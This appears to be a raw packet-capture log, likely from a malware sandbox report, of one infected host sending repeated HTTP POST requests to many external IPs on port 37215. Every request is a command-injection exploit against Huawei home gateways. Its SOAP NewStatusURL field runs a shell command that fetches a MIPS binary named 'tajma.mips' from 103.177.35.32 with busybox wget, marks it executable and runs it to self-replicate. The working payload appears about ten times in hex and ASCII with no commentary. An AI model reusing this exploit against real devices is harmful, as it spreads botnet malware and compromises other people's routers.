                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3140192.168.2.2342262197.101.190.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.603997946 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3141192.168.2.2359616134.17.252.23837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.604022026 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3142192.168.2.2359198133.93.60.19337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.604022980 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3143192.168.2.234307239.198.37.8837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.604038000 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3144192.168.2.2343516197.62.67.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.604058027 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3145192.168.2.2343074157.224.190.23037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.604068041 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3146192.168.2.235841641.65.2.12437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.604089022 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3147192.168.2.2337928197.19.245.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.604125977 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3148192.168.2.233834641.191.238.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.645111084 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3149192.168.2.2358712143.138.237.4337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659240007 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
